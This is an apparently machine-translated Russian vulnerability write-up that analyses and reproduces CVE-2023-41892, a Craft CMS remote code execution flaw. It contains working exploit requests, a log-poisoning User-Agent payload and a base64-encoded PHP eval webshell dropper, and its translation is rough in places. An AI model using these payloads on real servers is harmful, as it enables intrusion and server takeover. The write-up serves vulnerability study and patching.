Подпишитесь на нас ❤️, добавьте звездочку 🌟 и учитесь безопасности вместе! Автор:XbnWa@Timeline Sec Количество слов в этой статье: 2231. Время чтения: 2~4 минуты. Заявление: Это только для ознакомления, пожалуйста, не используйте его в незаконных целях, в противном случае вы будете нести ответственность за последствия.

0x01 Введение

Craft CMS — это система управления контентом с открытым исходным кодом, ориентированная на удобный процесс создания контента с четкой логикой. Это бесплатная и легко настраиваемая платформа дизайна, которую можно использовать для создания личных или корпоративных веб-сайтов, а также для создания веб-сайтов корпоративного уровня. . система электронной коммерции.

0x02 Обзор уязвимостей

Номер уязвимости: CVE-2023-41892.

Craft CMS имеет уязвимость внешнего интерфейса для удаленного выполнения кода. Злоумышленник может создать вредоносный запрос для выполнения произвольного кода и управления сервером.

0x03 Затронутая версия

4.0.0-RC1 <= Craft CMS <= 4.4.14

0x04 Настройка среды

Предварительные шаги: после установки phpstudy загрузите версию php8+ и mysql5.7.8+, затем переустановите CraftCMs. Откройте cmd и запустите настройку phpcraft, чтобы установить основную информацию.

Я продолжаю получать ошибки при запуске службы phpcraft. Не могу найти класс

расширение = php_intl.dll не найдено в php.ini

Я попробовал другой метод: скопировал файл, начинающийся с icu, и поместил его в bin-файл Apache.

Перезапуск апача все равно не помогает, забыл сделать скриншот. Затем добавьте расширение=php_intl.dll непосредственно в файл php.ini.

Перезапустите еще раз, настройка среды завершена.

0x05 Анализ уязвимостей и повторение

Анонс на официальном сайте https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g https://github.com/craftcms/cms/commit/c0a37e15cc925c473e60e27fe64054993b8 67ac1#diff-47dd43d86f85161944dfcce2e41d31955c4184672d9bd9d82b948c6b01b86476

файл патча

src/controllers/ConditionsController.php

@@ -34,6 +34,12 @@ class ConditionsController extends Controller
     */
    public function beforeAction($action): bool
    {
        if (!parent::beforeAction($action)) {
            return false;
        }

        $this->requireCpRequest();

        $baseConfig = Json::decodeIfJson($this->request->getBodyParam('config'));
        $config = $this->request->getBodyParam($baseConfig['name']);
        $newRuleType = ArrayHelper::remove($config, 'new-rule-type');
@@ -48,7 +54,7 @@ public function beforeAction($action): bool
            $this->_condition->addConditionRule($rule);
        }

        return parent::beforeAction($action);
        return true;
    }

    /**

Поскольку я не знаю конкретного значения места уязвимости, я нажал еще несколько точек останова, чтобы отследить его.

Выполнить POC

POST /CraftCMS/web/index.php HTTP/1
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 238

action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream",    "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}

Отслеживание точек останова Преобразуйте входящее значение конфигурации в строку json, получите значение имени в json и удалите элемент нового типа правила. затем,ПозвонивCraft::app->getConditions()Способ получения условного обслуживанияобъект,Снова создайте условия объект

Определите, существуют ли условия маршрутизации/рендеринга. Если они существуют, они перейдут. Если они не существуют, они сообщат об ошибке.

Отсюда после точки останова, похоже, идет отладочная информация, определение того, сообщается ли об ошибке, запись в журнал и т. д.

Вернитесь к вышесказанному и продолжайте смотреть на исполнение здесь и искать их одно за другим.

Почему я не могу найти его с помощью vscode? ? ?

Точка останова, чтобы увидеть процесс выполнения,принять некоторые параметры,и инициализироватьобъектхарактеристики。вызовActionСтруктура классафункция Воляid, controller,

Продолжайте отслеживать контроллер, который используется для обработки запросов и ответов пользователей. Здесь мы в основном смотрим на входящиеПараметр id обрабатывается и просматриваетсяidВключен ли параметр в модуль, Возвращает true, если оно содержит, в противном случае — false

Когда правда,Используйте функцию array_unshift.,Волямодуль вставлен вmodulesмножествоначало, Указывает, что модуль прошел проверку метода beforeAction. ложь напрямую сломать

Посмотреть $conditionsService

Выполните createCondition, используя метод ArrayHelper::remove.,отУдалите элемент с именем class из массива конфигурации и назначьте егоclass,Имя класса, представляющее объект состояния. после назначения

Определите, начинается ли имя с as,是的话вызов$this->attachBehavior($name, $value instanceof Behavior ? $value : Метод Yii::createObject($value)). Указывает, что если $value является экземпляром Behavior, используйте $value напрямую, в противном случае используйте метод Yii::createObject($value) для создания объекта поведения в соответствии с конфигурацией $value.

Одноэтапная отладка для создания объекта, определения того, что входящий массив должен содержать класс или _class, и выполнения возврата static::container->get(params, type), в противном случае будет сообщено об ошибке

Выполнить возврат this->build(params, config)

Выполнить, если __construct существует, создать пустой массив $addDependities и передать параметр __construct.

Глобальный поиск __construct,Траверсмножество,Воляfn присваивает объекту свойство. Имя свойства — fn, а ключ ().name）сращивание,Указывает префикс и имя метода

Поиск _fn_close обнаружил, что функция __destruct была вызвана для уничтожения, и эту функцию можно настроить.

Наконец сформировали этот POC

action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream",    "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}

RCE

Убедитесь, что пространство имен файла PhpManager.php — yii\rbac, возможно, там есть файл require, содержащий

Вид: Журналирование | Документация Craft CMS | 4.x Веб-[Y-m-d].log хранится в каталоге Storage/logs/. Он назван в соответствии с годом, месяцем и днем. Попробуйте. используйте этот файл.

action=conditions/render&configObject=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"\\yii\\rbac\\PhpManager","__construct()":[{"itemFile":"/phpstudy_pro/WWW/CraftCMS/storage/logs/web-2023-11-24.log"}]}}

Параметр заголовка User-Agent не подлежит кодированию. Он записывается в первый запрос и включается во второй запрос.

Дневник вытаптывания

Здесь мы столкнулись с подводным камнем: если бы параметры были переданы неправильно в первый раз, мы не смогли бы пройти здесь весь день, потому что один из них был передан первым.

<?php echo "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";?>

Независимо от того, что будет передано позже, всегда будет сообщаться об ошибке, и ее нельзя будет выполнить!

Очистите журнал здесь, повторите попытку, запишите и выполните успешно.

Поскольку одинарные и двойные кавычки экранируются обратной косой чертой, рассмотрите возможность использования команды обратного кавычки напрямую.

User-Agent: <?php `echo PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4=|base64 -d>shell.php`;?>

Файл успешно создан. Windows выполняет его. Могут быть ошибки и запись не выполняется.

0x06 Как это исправить

Обновленная версия https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g.

Справочная ссылка

https://forum.butian.net/share/2447 https://blog.csdn.net/df981011512/article/details/82699845 https://blog.csdn.net/df981011512/article/details/89678763 http://www.bmth666.cn/2023/09/26/CVE-2023-41892-CraftCMS%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/

Рекомендуемые услуги

Исторические дыры

CVE-2021-41749

CVE-2020-9757